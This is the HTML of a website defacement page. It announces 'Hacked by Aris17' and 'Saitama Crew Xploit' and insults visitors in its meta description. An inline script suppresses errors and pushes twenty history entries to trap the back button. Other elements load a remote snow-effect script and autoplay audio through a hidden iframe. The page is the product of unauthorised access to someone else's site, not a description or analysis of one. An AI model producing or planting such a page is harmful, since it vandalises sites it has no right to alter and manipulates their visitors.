
<html>
		<head>
	<meta name="description" content="Hey stoopid bitch...">
	<meta name="theme-color" content="black">
			<title>Defaced???</title>
			<link rel="icon" href="https://e.top4top.io/p_2041i7znv0.jpg" type="image/png">
<style media="screen">
  @import url(http://fonts.googleapis.com/css?family=Nova+Square|Kanit|Play|Satisfy|Great+Vibes);
  
  html {
  					background: black;
  					background-repeat:no-repeat;
  					background-attachment: fixed;		
  					}
  					
top{
				position: absolute;
				top:30%;
				right:50%;
			}
mid{
				position: absolute;
				top:45%;
				left:50%;
				font-family: Kanit;
				font-size:55;
				color: #EEEEEE;
				text-shadow: 0pt 0pt 10pt aqua;
			}
mid2{
         font-family: Nova Square;
         font-size: 35;
         }
				</style>
				<script> function ClearError() {return true;}window.onerror = ClearError; 	 (function () { 	 for(var i = 0; i < 20; i++) { 	 history.pushState(null, document.title, window.location.href ); 	 } 	 })(document, window, history); 	 document.location.href = "#Aris17"; </script>
</head>
<script type="text/javascript" src="https://rawgit.com/maringngerrang/js/master/salju.js" /></script> <script type="text/javascript"> snowStorm.snowColor = 'white'; snowStorm.flakesMaxActive = 150; snowStorm.useTwinkleEffect = true;</script>
<body><top>
<img src="https://j.top4top.io/p_2041822bw0.gif" height="500" width="500">
</top>
<mid>Hacked by Aris17<br><mid2>&nbsp; Saitama Crew Xploit</mid2></mid>
<footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid aqua; border-bottom: 1px solid aqua"><br>
<font face="Great Vibes" color="white" size="5">Saitama Crew Xploit<br></font>
</body>
			<iframe width="0" height="0" loop="true" src="http://www.omega-jordan.com/nostalgia.mp3" frameborder="0" allowfullscreen></iframe>
			</html>